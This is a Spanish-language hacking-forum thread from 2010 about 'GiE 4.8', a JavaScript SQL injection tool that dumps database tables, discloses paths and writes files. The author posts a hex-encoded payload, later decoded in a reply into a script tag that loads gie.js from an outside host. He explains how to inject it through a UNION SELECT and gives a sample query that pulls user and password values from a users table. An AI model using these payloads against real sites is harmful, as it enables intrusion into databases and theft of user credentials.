GiE 4.8 - SQLi

Tema destacado: [Overclocking] Récords de overclock del foro

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

GiE 4.8 - SQLi

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: GiE 4.8 - SQLi (Leído 3,164 veces)

Pony-Magic

Desconectado

Mensajes: 36

GiE 4.8 - SQLi

« en: 13 Diciembre 2010, 09:26 »

General Injection Explorer 4.8
version anterior.

ajax peticiones con async
dumpea tablas en <table> y .SQL
full path disclosure
write file

Paste2 Codigo de fuente.
Archivo Gie.JS

Código:

((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

-> usar ((0xCode)) en vez de (0xCode)

@name: General Injection Explorer
@version: 4.8
@author: PonyMagic
@date: 12/12/2010 - 2:51
@contact: PonyMagic@live.com

PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]


	En línea

Darioxhcx

Desconectado

Mensajes: 2.150

Re: GiE 4.8 - SQLi

« Respuesta #1 en: 13 Diciembre 2010, 17:31 »

saaaaabeeeeeeeeeeeeeeeeeeeeee


	En línea

Karcrack

Desconectado

Mensajes: 2.192

Se siente observado ¬¬'

Re: GiE 4.8 - SQLi

« Respuesta #2 en: 17 Diciembre 2010, 11:23 »

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:

Código:

((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?


	En línea

Pony-Magic

Desconectado

Mensajes: 36

Re: GiE 4.8 - SQLi

« Respuesta #3 en: 17 Diciembre 2010, 12:52 »

Cita de: Karcrack en 17 Diciembre 2010, 11:23

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:

Código:

((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?

cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:

.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--

En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.


	En línea

xassiz~

Desconectado

Mensajes: 428

Re: GiE 4.8 - SQLi

« Respuesta #4 en: 17 Diciembre 2010, 14:37 »

Cita de: Karcrack en 17 Diciembre 2010, 11:23

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:

Código:

((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?

Código

<script src='http://kryptosecurity.com.ar/gie.js'/>


	En línea

#ka0labs
#byte-inside
#twitter

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Problema con SQLI Helper Hacking Básico	Nardo[N]	5	2,368	24 Febrero 2011, 04:32 por Nardo[N]
	Prevención de SQLi Nivel Web	Castg!	2	1,259	22 Febrero 2011, 00:14 por Castg!
	5013 webs vulnerables a sqli Nivel Web	Tyrz	0	1,994	12 Abril 2011, 10:01 por Tyrz
	Error 403 ¿Posible SQli? PHP	dimitrix	6	1,228	3 Julio 2011, 07:11 por Spider-Net
	Ayuda con SQLi Bugs y Exploits	W0LFeR	1	299	16 Mayo 2012, 13:52 por jackgris